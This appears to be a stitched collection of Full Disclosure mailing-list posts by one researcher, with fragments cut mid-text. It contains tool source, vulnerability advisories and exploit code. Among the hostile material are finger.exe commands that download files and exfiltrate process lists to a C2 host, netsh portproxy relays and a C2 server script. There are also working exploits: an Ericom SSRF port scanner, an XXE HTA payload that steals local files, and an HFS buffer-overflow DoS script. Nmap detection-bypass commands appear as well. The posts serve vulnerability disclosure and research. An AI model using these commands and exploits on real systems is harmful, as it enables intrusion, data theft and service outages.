hosts, e.g. intranet-apps, printers and ACKS #from SMB connected shares to try reduce false positives. # #LOG -l flag, default size limit for writing to disk is 1MB. # #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc. #To detect UDP scans use the -u flag, then can also combine with -f port filter #(reduce noise) on specific dest ports like 137,161,1900,2869,7680. # #PCAP saving -s flag, default size limit is also 1MB. # #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect. # #Private Network range: #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored. # #BYPASS examples --scanflags and custom packet window sizes: #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets. # #These scans can bypass Recon-Informer and correctly report open ports found. #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139 #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x # #Therefore, I accounted for some of these in Recon-Informer to report these detections. # #SCANFLAGS #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct) #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct) #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned) #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful) #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful) # #The above scanflag examples, would have bypassed detection if we didn't ch
[FD] NtFileSins v2.2 / Windows NTFS Privileged File Access Enumeration Tool (Python v3)
from subprocess import Popen, PIPE import sys,argparse,re #MIT License #Copyright (c) 2020 John Page (aka hyp3rlinx) #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. #Permission is also explicitly given for insertion in vulnerability databases and similar, #provided that due credit is given to the author John Page (aka hyp3rlinx). # # # NtFileSins v2.2 (c) # By John Page (aka hyp3rlinx) # Python v3 compatible # Enhancements: search target user dir on first pass, unless the -d flag is used, added .dat, .tmp file ext checks. # TODO: Alternate Data Streams (ADS) check e.g. abc.txt:test.txt:$DATA # Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt # # NtFileSins is a Windows File Enumeration Intel Gathering Tool. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determine existence by compare inconsistent Windows error messages. # # Requirements: 1) target users with >= privileges (not admin to admin). # 2) artifacts must contain a dot "." or returns false positives. # # Windows message "Access Denied" = Exists # Windows message "The system cannot find the file" = Not exists # Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command, # operable program or batch file" = Admin to Admin so this script is not required. # # Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose. # For evil or maybe check for basic malware IOC existence on disk with user-only rights. #From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe #or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass. #Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide #processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is #how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the #malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights. # #Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd. #However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages. # #==# # NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.2 (c) # # By John Page (aka hyp3rlinx) # # Apparition Security # #==# BANNER=''' _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2.2 (c) By hyp3rlinx ApparitionSec ''' sin_cnt=0 internet_sin_cnt=0 found_set=set() zone_set=set() ARTIFACTS_SET=set() ROOTDIR = "c:/Users/" ZONE_IDENTIFIER=":Zone.Identifier:$DATA" USER_DIRS=["Contacts","Desktop",
[FD] Recon Informer v1.2 - Intel for offensive systems tool.
import logging,os,ctypes,sys,argparse,time,re from subprocess import * from datetime import datetime from pkgutil import iter_modules import pkg_resources #Recon Informer (c) v1.2 #By John Page (hyp3rlinx) #ApparitionSec #hyp3rlinx.altervista.org #twitter.com/hyp3rlinx #apparition...@gmail.com #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc #== #v1.2 fixed: window title bug, removed pygetwindow module. # #Recon Informer is a basic real-time anti-reconnaissance (nmap) detection tool for offensive #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. # #Purpose: #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever. #Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel. #Therefore, this script is most useful for basic short-term defensive visibility. # #Features: #Attempt to detect and identify typical port scans generated using Nmap including scan type. #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy). # #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result. #XMAS scans work against systems following RFC 793 for TCP/IP and don’t work against any Windows versions, #NULL is another type that don't work well on Windows. # #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS #its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied. #With -s flag you can add extra scan types to detect that otherwise would be ignored. # #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default. #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you #will see this detection preceding most scans. Also, you may see (noise) non-reconaissance related ARP #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag. # #ICMP #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping. # #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS. #Firewall rule for blocks are in-bound "ANY" but still allows out-bound. #FW rules are named like ReconInformer_. # #DELETE FW RULE -d to remove FW rules for blocked hosts. # #WHITELIST -w HOST-IP(s) you never want to block on. # #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc. #ignore packets destined for specific ports to try reduce false positive probe alerts. # #IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS #from SMB connected shares to try reduce false positives. # #LOG -l flag, default size limit for writing to disk is 1MB. # #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc. #To detect UDP scans use the -u flag, then can also combine with -f port filter #(reduce noise) on specific dest ports like 137,161,1900,2869,7680. # #PCAP saving -s flag, default size limit is also 1MB. # #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect. # #Private Network range: #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored. # #BYPASS examples --scanflags and custom packet window sizes: #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets. # #These scans can bypass Recon-Informer and correctly report open ports found. #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139 #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x # #Therefore, I accounted for some of these in Recon-Informer to report these detections. # #SCANFLAGS #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct) #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct) #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned) #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful) #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful) # #The above scanflag examples, would have bypassed detection if we didn't check packets for them. #Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks: # #10=(0x00a) SYNPSH #34= (0x22) SYNURG #42=(0x02a) SYNPSHURG #66 (0x42) SYNECN #74 (0x04a) SYNPSHECN #98 (0x062) SYNURGECN #106 (0x06a) SYNPSHURGECN #130 (0x082) SYNCWR #138 (0x08a) SYNPSHCWR #162 (0x0a2) SYNURGCWR #170 (0x0aa) SYNPSHURGCWR #194 (0x0c2) SYNECNCWR #202 (0x0ca) SYNPSHECNCWR #226 (0x0e2) SYNURGECNCWR #234 (0x0ea) SYNPSHURGECNCWR # #Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!. #ip=IP(dst="192.168.1.104")
[FD] Windows TCPIP Finger Command / C2 Channel and Bypassing Security Software
[+] Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security
Software
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS,
can be used as a file downloader and makeshift C2 channel.
Legitimate use of Windows Finger Command is to send Finger Protocol queries
to remote Finger daemons to retrieve user information.
However, the finger client can also save the remote server response to disk
using the command line redirection operator ">".
Intruders who compromise a computer may find it is locked down and
"unknown" applications may be unable to download programs or tools.
By using built-in native Windows programs, its possible they may be
whitelisted by installed security programs and allowed to download files.
Redteams and such using LOL methods have made use of "Certutil.exe", native
Windows program for downloading files. However, Certutil.exe is
recently blocked by Windows Defender Antivirus and logged as event
"Trojan:Win32/Ceprolad.A" when it encounters http/https://.
Therefore, using Windows finger we can bypass current Windows Defender
security restrictions to download tools, send commands and exfil data.
The Finger protocol as a C2 channel part works by abusing the "user" token
of the FINGER Query protocol "user@host". C2 commands masked as
finger queries can download files and or exfil data without Windows
Defender interference.
Download files:
C:\> finger @HOST > Malwr.txt
Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21
Typically, (Port 79) default port used by FINGER protocol is often blocked
by organizations. Privileged users can bypass this using
Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions
to reach servers using unrestricted ports like 80/443.
Portproxy queries are then sent first to the Local Machines ip-address
which are then forwarded to the C2 server specified.
Port 43 (WHOIS) traffic.
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79
connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43
connectaddress=[LOCAL-IP] connectport=79
To display Portproxy use "C:\>netsh interface portproxy show all".
E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt
E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt
To leverage Windows finger.exe successfully as a file downloader and help
evade network security devices, serve Base64 encoded text-files.
DarkFinger.py expects to receive the first two characters of the filename
for the Finger Protocol Host token part for file downloads.
DarkFinger C2 expects exfil data to prefixed with the dot "." character, so
any arbitrary inbound querys are not confused for exfil.
This can be changed to whatever or even expanded upon to use XOR
obfuscation methods etc... as this is just for basic PoC.
[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.
"Windows Defender Antivirus has taken action to protect this machine from
malware or other potentially unwanted software.
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
... etc"
PowerShell, also used as an LOL method to download files usually generates
Windows event logs. Finger initiated downloads write
to disk and will leave forensic artifacts. Finger TCP/IP traffic going out
to Port 80/443 minus the HTTP protocol may stand out as well.
However, searching the Windows event logs for finger.exe entries, I found
no trace of it generating Windows event logs anywhere.
DarkFinger.py C2 is very basic with no security. It's only to demonstrate
using Windows Finger Command for as a C2 channel
and show the possibilities. Therefore, anyone can request to change the
Port DarkFinger C2 listens on and or download files.
During my research, I found nothing on the internet publicly using or
documenting Windows TCPIP Finger Command for use as C2 channel.
Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat"
which calls the Windows finger.exe in attacker friendly ways.
Tested successfully Windows 10.
[DarkFinger-C2.py]
import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT
#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
#Agents can ch
[FD] CVE-2020-24548 / Ericom Access Server for (AccessNow & Ericom Blaze) v9.2.0 / Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.ericom.com
[Product]
Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0
AccessNow is an HTML5 remote desktop gateway that works from any device
with an HTML5 compatible browser,
including from Chromebooks and locked down devices. Ericom Blaze provides
remote desktop connectivity from
Mac, Windows and Linux devices to applications on office / home PCs and
virtual desktops (VDI).
[Vulnerability Type]
Server Side Request Forgery
[CVE Reference]
CVE-2020-24548
[Security Issue]
Ericom Access Server allows attackers to initiate SSRF requests making
outbound
connections to arbitrary hosts and TCP ports. Attackers, who can reach the
AccessNow server can target internal systems that are behind firewalls that
are
typically not accessible. This can also be used to target third-party
systems
from the AccessNow server itself.
The AccessNow server will return an attacker friendly response, exfiltrating
which ports are listening for connections. This can bypass Firewall rules
and
undermine the integrity of other systems and security controls in place.
E.g. listen using Netcat, Nc64.exe -llvp 25
A) Ericom Server 192.168.88.152 (defaults port 8080)
B) Attacker 192.168.88.162
C) Victim 192.168.1.104
Using Wireshark we can observe A sends a SYN packet to C (port 25)
C sends SYN/ACK to A
A sends ACK to C.
A sends ACK/FIN to C port 25.
We will then get an AccessNow server response similar to below.
["C","M",["Cannot connect to '192.168.1.104:25'.",true]]
This message indicates we cannot connect and helpfully informs us of closed
vs open ports.
[Affected Component]
Ericom Server port 8080 will forward connections to arbitrary Hosts and or
Ports
which are sent using Web-Socket requests. Ericom server then replies with a
"Cannot connect to" message if a port is in a closed state.
[Attack Vectors]
Remote attackers can abuse the Ericom Access Server to conduct port
scans on arbitrary systems. This is possible due to a server side
request forgery vulnerability and using a remote TCP socket program.
[Impact Information Disclosure]
true
[CVE Impact Other]
Exfiltration of open ports
[Exploit/POC]
import sys,ssl
import websocket
##pip install websocket-client #Required
#By hyp3rlinx
#ApparitionSec
#
#Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF
#
BANNER="""
__ _
| |/ |
| |__ _ __ _ __ ___ _ __| | ___ _ __ ___
| __| | '__| '__/ _ \| '__| |/ _ \| '_ ` _ \
| || | | | | (_) | | | |___| (_) | | | | | |
|__|_| |_| \___/|_| \_\___/|_| |_| |_|
SSRF Exploit
"""
def ErrorCom(vs,vp,t,p):
try:
ws =
websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p,
sslopt={'cert_reqs': ssl.CERT_NONE})
ws.send("SSRF4U!")
result = ws.recv()
#print(result)
if result.find("Cannot connect to")==-1:
print("[+] Port "+p+" is open for business :)")
else:
print("[!] Port " + p+ " is closed :(")
ws.close()
except Exception as e:
print(str(e))
if __name__=="__main__":
if len(sys.argv) != 5:
print(BANNER)
print("[+] Ericom Access Server v9.2.0 - SSRF Exploit -
CVE-2020-24548")
print("[+] By Hyp3rlinX / ApparitionSec")
print("[!] Usage: ,,,")
exit()
if len(sys.argv[4]) > 5:
print("[!] Port out of range")
exit()
print(BANNER)
ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
[PoC Video URL]
https://www.youtube.com/watch?v=oDTd-yRxVJ0
[Network Access]
Remote
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification : June 21, 2020
Received automated reply : June 21, 2020
Request for status : June 30, 2020
Vendor "Forwarded all the detail to our R and Management team" : June 30,
2020
Request for status : July 13, 2020
No vendor reponse
Informed vendor advisory: August 11, 2020
Request for status : August 20, 2020
No vendor reponse
August 22, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is
[FD] Microsoft Windows mshta.exe HTA File / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MSHTA-HTA-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]www.microsoft.com [Product] Windows MSHTA.EXE .HTA File An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript. The HTML is used to generate the user interface, and the scripting language is used for the program logic. An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application. [Vulnerability Type] XML External Entity Injection [Impact] Information disclosure, Recon [CVE Reference] N/A [Security Issue] Windows mshta.exe allows processing of XML External Entitys, this can result in local data-theft and or program reconnaissance upon opening specially crafted HTA files. From an attacker perspective, since we are not dependent on scripting languages like Javascript, VBScript or WScript.Shell, we may have better chances at subverting endpoint protection systems as we are only using XML markup. HTA exploits found online typically show code execution, with reliance on ActiveX Objects and scripting engines and hence are more easily detected by security products. Many of these exploits also use payload obfuscation techniques for stealth. However, I found nothing publicly documented that leverages XML injection targeting the mshta.exe HTA file-type. Yea I know, no code execution. However, we get stealthy data theft with recon capabilities. Armed with this info, we can more accurately target potential software vulnerabilities at a later date from info gathering a systems program installations. Usually, this type of recon is seen in first-stage malware infections using the Windows CreateToolhelp32Snapshot API. Therefore, since theres no documented HTA exploits using XXE attacks for this file type, I release the advisory. Successfully tested on Windows 10 and Windows Servers 2016, 2019. [Exploit/POC] Multi program recon and check if running in a Virtual Machine all in a single HTA file, change IP accordingly. 1) "Doit.hta" http://127.0.0.1:8000/datatears.dtd;> %dtd;]> http://127.0.0.1:8000/datatears.dtd;> %dtd;]> http://127.0.0.1:8000/datatears.dtd;> %dtd;]> 2) The "datatears.dtd" DTD file hosted on attackers server. http://127.0.0.1:8000?%file;'>"> %all; 3) Local Python v3 web-server listening on port 8000 to receive victims info. python -m http.server [POC Video URL]https://www.youtube.com/watch?v=XaTrBEu4Ghw [Network Access] Remote [Severity] High [Disclosure Timeline] MSHTA .HTA files are classified untrusted, many threats already well known. July 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2020-13432 - HFS HTTP File Server / Remote Buffer Overflow DoS
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.rejetto.com
[Product]
HFS Http File Server v2.3m Build 300
[Vulnerability Type]
Remote Buffer Overflow (DoS)
[CVE Reference]
CVE-2020-13432
[Security Issue]
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual
files or folders are used, allows remote attackers to trigger an
invalid-pointer write access violation via concurrent HTTP requests
with a long URI or long HTTP headers like Cookie, User-Agent etc.
Remote unauthenticated attackers can send concurrent HTTP requests
using an incrementing or specific payload range of junk characters for
values in the URL parameters or HTTP headers sent to the server. This
results in hfs.exe server crash from an invalid pointer write access
violation.
Requirements:
hfs.exe must have at least one saved virtual file or folder present.
Test using a remote IP and NOT from the same machine (localhost).
Dump...
(e4c.3a8): Access violation - code c005 (first/second chance not
available)
For analysis of this file, run !analyze -v
WARNING: Stack overflow detected. The unwound frames are extracted from
outside normal stack bounds.
eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b esi=
edi=0002
eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
777ef8b4 53 pushebx
0:000> !load winext/msec
0:000> !exploitable
WARNING: Stack overflow detected. The unwound frames are extracted from
outside normal stack bounds.
*** WARNING: Unable to verify checksum for hfs.exe
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
ntdll!RtlpResolveAssemblyStorageMapEntry+0x0018
(Hash=0x7a29717c.0x325e6a71)
PROCESS_NAME: hfs.exe
FOLLOWUP_IP:
hfs+8fad7
0048fad7 8945f0 mov dword ptr [ebp-10h],eax
WRITE_ADDRESS: 000a0e08
[References]
https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01
[Exploit/POC]
from socket import *
import time,sys
#HFS HTTP File Server v2.3m build 300.
#Vendor: www.rejetto.com
#Remote Remote Buffer Overflow DoS
#Note: hfs.exe must have at least one saved virtual file or folder on the
target
#test using a remote IP and not from the same machine.
#Discovery: hyp3rlinx
#hyp3rlinx.altervista.org
#ISR: ApparitionSec
#=
res=""
once=0
cnt=0
max_requests=1666
def hfs_dos():
global ip,port,length,res,once,cnt,max_requests
cnt+=1
length += 1
payload = "A"*length
try:
s=socket(AF_INET, SOCK_STREAM)
s.settimeout(2)
s.connect((ip,port))
##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
s.send(bof.encode("utf-8"))
if once==0:
once+=1
res = s.recv(128)
if res != "":
print("Targets up please wait...")
if "HFS 2.3m" not in str(res):
print("[!] Non vulnerable HFS version, exiting :(")
exit()
except Exception as e:
if e != None:
if str(e).find("timed out")!=-1:
if res=="":
print("[!] Target is not up or behind a firewall? :(")
exit()
else:
print("[!] Done!")
exit()
s.close()
if cnt == max_requests:
return False
return True
def msg():
print("HFS HTTP File Server v2.3m build 300.")
print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
print("Virtual HFS saved file or folder required.")
print("Run from a different machine (IP) than the target.")
print("By Hyp3rlinx - ApparitionSec\n")
if __name__=="__main__":
length=3
if len(sys.argv) != 3:
msg()
print("Usage: , ")
exit()
ip = sys.argv[1]
port = int(sys.argv[2])
msg()
while True:
if not hfs_dos():
print("[!] Failed, non vuln version or no virtual files exist
:(")
break
[POC Video URL]
https://www.youtube.com/watch?v=qQ-EawfXuWY
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: May 18, 2020
Vendor reply: May 18, 2020
Vendor confirm vulnerability: May 19, 2020
Vendor creates fix: May 20, 2020
Vendor released new versi
[FD] Avaya IP Office v9.1.8.0 - 11 Insecure Transit Password Disclosure CVE-2020-7030
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]www.avaya.com [Product] Avaya IP Office v9.1.8.0 - 11 IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively. [Vulnerability Type] Insecure Transit Password Disclosure [CVE Reference] CVE-2020-7030 ASA-2020-077 [Security Issue] A sensitive information disclosure vulnerability exists in the web interface component of IP Office that may potentially allow a local user to gain unauthorized access to the component. The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string. https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y=https://x.x.x.x:7070=en_US wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0& X-Atmosphere-Framework=2.0.5-javascript=websocket=0=text/x-gwt-rpc;%20charset=UTF-8=true Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y Value: Administrator:Administrator The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker. The URL plus the credentials can potentially be leaked or stored in some of the following locations. Browser History Browser Cache Browser Developer Tools Cached by web proxy Referer Header Web Logs Shared Systems [Avaya Products affected] Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2 [References]https://downloads.avaya.com/css/P8/documents/101067493 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: February 19, 2020 Vendor confirms issue: March 4, 2020 Vendor release advisory fix : June 3, 2020 June 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WinGate v9.4.1.5998 Insecure Permissions EoP CVE-2020-13866
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINGATE-INSECURE-PERMISSIONS-LOCAL-PRIVILEGE-ESCALATION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]wingate.com [Product] WinGate v9.4.1.5998 WinGate is a sophisticated integrated Internet gateway and communications server designed to meet the control, security and email needs of today's Internet-connected businesses. [Vulnerability Type] Insecure Permissions EoP [CVE Reference] CVE-2020-13866 [Security Issue] WinGate has insecure permissions for the installation directory, which allows local users ability to gain privileges by replacing an executable file with a Trojan horse. The WinGate directory hands (F) full control to authenticated users, who can then run arbitrary code as SYSTEM after a WinGate restart or system reboot. C:\Program Files\WinGate>cacls WinGate.exe C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R [Affected Component] WinGate Installation Directory [Impact Code execution] true [Impact Denial of Service] true [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Exploit/POC] Logon as standard user replace WinGate.exe with a trojan executable, wait for restart or reboot the system, your code runs as SYSTEM. [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: May 10, 2020 Vendor acknowledgement: May 10, 2020 Vulnerability confirmed: May 18, 2020 Request status: May 22, 2020 No reply Notify vendor request CVE: May 26, 2020 No reply Advised of public disclosure: June 1, 2020 No reply June 4, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] netABuse - Windows Insufficient Authentication Logic Scanner
import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process
#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#Advisory:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
#---
#When a remote systems built-in Administrator account is enabled and both
the remote and the target system
